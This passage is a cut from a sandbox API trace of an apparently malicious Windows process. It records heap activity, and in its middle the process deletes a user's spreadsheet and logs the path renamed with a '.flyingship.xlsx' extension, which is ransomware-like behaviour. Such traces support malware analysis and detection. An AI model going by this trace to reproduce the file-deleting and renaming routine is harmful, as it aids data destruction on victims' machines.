Size=0x4) returned 0x9c27c8 [0170.665] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd888 | out: hHeap=0x8a0000) returned 1 [0170.665] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27c8 | out: hHeap=0x8a0000) returned 1 [0170.665] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda50 | out: hHeap=0x8a0000) returned 1 [0170.665] FreeLibrary (hLibModule=0x75990000) returned 1 [0170.665] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0170.665] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0170.665] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0170.665] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27a8 | out: hHeap=0x8a0000) returned 1 [0170.665] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0170.665] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deee8 | out: hHeap=0x8a0000) returned 1 [0170.665] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9c70 | out: hHeap=0x8a0000) returned 1 [0170.665] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28c8 | out: hHeap=0x8a0000) returned 1 [0170.665] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba330 | out: hHeap=0x8a0000) returned 1 [0170.665] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba390 | out: hHeap=0x8a0000) returned 1 [0170.665] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd768 | out: hHeap=0x8a0000) returned 1 [0170.665] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9c0 | out: hHeap=0x8a0000) returned 1 [0170.665] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7f8 | out: hHeap=0x8a0000) returned 1 [0170.665] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd960 | out: hHeap=0x8a0000) returned 1 [0170.665] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd528 | out: hHeap=0x8a0000) returned 1 [0170.665] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5b8 | out: hHeap=0x8a0000) returned 1 [0170.666] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8a0 | out: hHeap=0x8a0000) returned 1 [0170.666] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f58 | out: hHeap=0x8a0000) returned 1 [0170.666] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdab0 | out: hHeap=0x8a0000) returned 1 [0170.666] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd330 | out: hHeap=0x8a0000) returned 1 [0170.666] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd570 | out: hHeap=0x8a0000) returned 1 [0170.666] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0170.666] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0170.666] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2628 [0170.666] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e83b8 [0170.666] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28c8 [0170.666] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0170.666] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2628 [0170.666] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28c8 [0170.666] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0170.666] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2628 [0170.666] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28c8 [0170.666] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0170.666] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18f0 [0170.666] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf310 [0170.667] CharUpperBuffW (in: lpsz="_WINAPI_CLOSEHANDLE", cchLength=0x13 | out: lpsz="_WINAPI_CLOSEHANDLE") returned 0x13 [0170.667] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0170.667] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded30 [0170.667] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda08 [0170.667] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1960 [0170.667] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fe8 [0170.667] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba540 [0170.667] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b50 [0170.667] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0170.667] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd810 [0170.667] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1aa0 [0170.667] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1970 [0170.667] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b68 [0170.667] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0170.667] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd810 [0170.667] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b70 [0170.667] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0170.667] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9b9b68 [0170.667] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x9b9b68, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0170.669] FreeLibrary (hLibModule=0x75990000) returned 1 [0170.669] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0170.669] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b50 [0170.670] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e83b8 [0170.670] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a30 [0170.670] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0170.670] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b50 [0170.670] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a30 [0170.670] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0170.670] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def38 [0170.670] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd930 [0170.670] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18f0 [0170.670] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba078 [0170.670] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\g_g2urcnwKcCd17PjNc.xlsx", nBufferLength=0x7fff, lpBuffer=0x86efc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\g_g2urcnwKcCd17PjNc.xlsx", lpFilePart=0x0) returned 0x40 [0170.673] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\g_g2urcnwKcCd17PjNc.xlsx", lpFindFileData=0x87f010 | out: lpFindFileData=0x87f010*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbdc053e0, ftCreationTime.dwHighDateTime=0x1d57286, ftLastAccessTime.dwLowDateTime=0x290dce00, ftLastAccessTime.dwHighDateTime=0x1d5aa6f, ftLastWriteTime.dwLowDateTime=0xb1469c0, ftLastWriteTime.dwHighDateTime=0x1d661be, nFileSizeHigh=0x0, nFileSizeLow=0xa915, dwReserved0=0x89fe58, dwReserved1=0x773d1ecd, cFileName="g_g2urcnwKcCd17PjNc.xlsx", cAlternateFileName="G_G2UR~1.XLS")) returned 0x90af58 [0170.674] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\g_g2urcnwKcCd17PjNc.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\g_g2urcnwkccd17pjnc.xlsx")) returned 1 [0170.679] FindNextFileW (in: hFindFile=0x90af58, lpFindFileData=0x87f010 | out: lpFindFileData=0x87f010*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbdc053e0, ftCreationTime.dwHighDateTime=0x1d57286, ftLastAccessTime.dwLowDateTime=0x290dce00, ftLastAccessTime.dwHighDateTime=0x1d5aa6f, ftLastWriteTime.dwLowDateTime=0xb1469c0, ftLastWriteTime.dwHighDateTime=0x1d661be, nFileSizeHigh=0x0, nFileSizeLow=0xa915, dwReserved0=0x89fe58, dwReserved1=0x773d1ecd, cFileName="g_g2urcnwKcCd17PjNc.xlsx", cAlternateFileName="G_G2UR~1.XLS")) returned 0 [0170.679] FindClose (in: hFindFile=0x90af58 | out: hFindFile=0x90af58) returned 1 [0170.679] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0170.679] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0170.679] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deb78 [0170.679] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3d8 [0170.680] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1af0 [0170.680] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1c8 [0170.680] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a20 [0170.680] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d440 [0170.680] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba498 [0170.680] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1900 [0170.680] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db0a8 [0170.680] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0170.680] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0170.680] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deec0 [0170.680] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="x", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0170.680] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sx", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0170.680] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="lsx", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0170.680] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xlsx", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0170.680] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".xlsx", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0170.680] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0170.681] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0170.681] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0170.681] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0170.681] CreateFileW (lpFileName="C:\\PROGRA~2\\COMMON~1\\log.txt" (normalized: "c:\\progra~2\\common~1\\log.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0170.681] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0170.681] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f424 | out: lpNewFilePointer=0x0) returned 1 [0170.682] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0170.682] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f404 | out: lpNewFilePointer=0x0) returned 1 [0170.683] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0170.683] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f414 | out: lpNewFilePointer=0x0) returned 1 [0170.683] ReadFile (in: hFile=0x120, lpBuffer=0xa6b008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87f43c, lpOverlapped=0x0 | out: lpBuffer=0xa6b008*, lpNumberOfBytesRead=0x87f43c*=0xdc6, lpOverlapped=0x0) returned 1 [0170.684] ReadFile (in: hFile=0x120, lpBuffer=0xa6b008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87f43c, lpOverlapped=0x0 | out: lpBuffer=0xa6b008*, lpNumberOfBytesRead=0x87f43c*=0x0, lpOverlapped=0x0) returned 1 [0170.684] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0xdc6, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0170.684] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f404 | out: lpNewFilePointer=0x0) returned 1 [0170.684] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0170.684] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c5180 | out: hHeap=0x8a0000) returned 1 [0170.684] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\g_g2urcnwKcCd17PjNc.flyingship.xlsx\r\n", cchWideChar=78, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 78 [0170.684] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\g_g2urcnwKcCd17PjNc.flyingship.xlsx\r\n", cchWideChar=78, lpMultiByteStr=0x923ad0, cbMultiByte=78, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\g_g2urcnwKcCd17PjNc.flyingship.xlsx\r\n", lpUsedDefaultChar=0x0) returned 78 [0170.684] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd498 | out: hHeap=0x8a0000) returned 1 [0170.684] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x923ad0 | out: hHeap=0x8a0000) returned 1 [0170.684] WriteFile (in: hFile=0x120, lpBuffer=0x923b28*, nNumberOfBytesToWrite=0x4d, lpNumberOfBytesWritten=0x87f43c, lpOverlapped=0x0 | out: lpBuffer=0x923b28*, lpNumberOfBytesWritten=0x87f43c*=0x4d, lpOverlapped=0x0) returned 1 [0170.684] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x923b28 | out: hHeap=0x8a0000) returned 1 [0170.684] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0170.684] CloseHandle (hObject=0x120) returned 1 [0170.685] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd408 | out: hHeap=0x8a0000) returned 1 [0170.685] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0170.685] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xa6b008 | out: hHeap=0x8a0000) returned 1 [0170.688] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90af58 | out: hHeap=0x8a0000) returned 1 [0170.688] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db0a8 | out: hHeap=0x8a0000) returned 1 [0170.688] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0170.688] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1c8 | out: hHeap=0x8a0000) returned 1 [0170.688] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3d8 | out: hHeap=0x8a0000) returned 1 [0170.689] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8fff00 | out: hHeap=0x8a0000) returned 1 [0170.689] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0170.689] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba078 | out: hHeap=0x8a0000) returned 1 [0170.689] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba498 | out: hHeap=0x8a0000) returned 1 [0170.689] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deb78 | out: hHeap=0x8a0000) returned 1 [0170.689] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0170.689] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90add8 | out: hHeap=0x8a0000) returned 1 [0170.689] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0170.689] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db0f0 | out: hHeap=0x8a0000) returned 1 [0170.689] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba018 | out: hHeap=0x8a0000) returned 1 [0170.689] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de8a8 | out: hHeap=0x8a0000) returned 1 [0170.689] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0170.689] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de858 | out: hHeap=0x8a0000) returned 1 [0170.689] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ee038 | out: hHeap=0x8a0000) returned 1 [0170.689] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0170.689] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd708 | out: hHeap=0x8a0000) returned 1 [0170.689] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5a0 | out: hHeap=0x8a0000) returned 1 [0170.690] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5d0 | out: hHeap=0x8a0000) returned 1 [0170.690] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0170.690] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de830 | out: hHeap=0x8a0000) returned 1 [0170.690] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdb10 | out: hHeap=0x8a0000) returned 1 [0170.690] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de9e8 | out: hHeap=0x8a0000) returned 1 [0170.690] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0170.690] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de8f8 | out: hHeap=0x8a0000) returned 1 [0170.690] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd348 | out: hHeap=0x8a0000) returned 1 [0170.690] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd378 | out: hHeap=0x8a0000) returned 1 [0170.690] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de218 | out: hHeap=0x8a0000) returned 1 [0170.690] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0170.690] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de1a0 | out: hHeap=0x8a0000) returned 1 [0170.690] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd630 | out: hHeap=0x8a0000) returned 1 [0170.690] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd588 | out: hHeap=0x8a0000) returned 1 [0170.690] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4f8 | out: hHeap=0x8a0000) returned 1 [0170.690] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0170.690] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de7e0 | out: hHeap=0x8a0000) returned 1 [0170.690] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd510 | out: hHeap=0x8a0000) returned 1 [0170.690] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0170.690] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba570 | out: hHeap=0x8a0000) returned 1 [0170.690] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba288 | out: hHeap=0x8a0000) returned 1 [0170.690] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de920 | out: hHeap=0x8a0000) returned 1 [0170.690] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0170.691] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea10 | out: hHeap=0x8a0000) returned 1 [0170.691] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4e0 | out: hHeap=0x8a0000) returned 1 [0170.691] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1930 | out: hHeap=0x8a0000) returned 1 [0170.691] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de970 | out: hHeap=0x8a0000) returned 1 [0170.691] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda38 | out: hHeap=0x8a0000) returned 1 [0170.691] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba180 | out: hHeap=0x8a0000) returned 1 [0170.691] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea38 | out: hHeap=0x8a0000) returned 1 [0170.691] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0170.691] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90ad98 | out: hHeap=0x8a0000) returned 1 [0170.691] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0170.691] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0170.691] CharUpperBuffW (in: lpsz="_FILEINUSE", cchLength=0xa | out: lpsz="_FILEINUSE") returned 0xa [0170.691] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea38 | out: hHeap=0x8a0000) returned 1 [0170.691] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0170.691] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0170.691] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0170.691] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0170.691] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0170.692] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0170.692] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0170.692] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0170.692] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0170.692] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0170.692] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: 